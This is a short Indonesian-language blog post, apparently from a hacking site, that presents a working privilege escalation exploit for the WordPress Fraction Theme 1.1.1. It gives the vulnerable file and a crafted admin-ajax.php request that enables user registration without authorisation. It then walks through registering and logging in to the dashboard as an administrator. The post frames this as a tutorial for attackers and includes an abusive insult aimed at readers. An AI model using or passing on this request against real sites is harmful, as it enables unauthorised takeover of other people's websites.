LinuxSec Exploit

Nothing is Ever Locked

WordPress Fraction Theme Version 1.1.1 Suffers from a Privilege Escalation Vulnerability

by Jack Wilder Leave a Comment

Exploit nya masih anget kak :p . Baru kemaren dirilis di 1337day. Oke langsung saja ya alat dan bahat nya :3
Google Dorks :
USE YOUR BRAIN, BITCH !!

Vulnerability : /fraction-theme/functions/ajax.php

How to Exploit :
localhost/wordpress/wp-admin/admin-ajax.php?action=ot_save_options&users_can_register=1
Jika fitur register sebelumnya dilarang, dengan command ini maka fitur register akan dibuka secara ilegal.

Habis itu, buka localhost/wordpress/wp-login.php?action=register

Cek email, masukin user dan password, logged to dashboard as Admin 🙂

Sekian tutor kali ini semoga bermanfaat.

Shares

Reader Interactions

Leave a Reply

Your email address will not be published. Required fields are marked *

LinuxSec / 55 queries in 0.08 seconds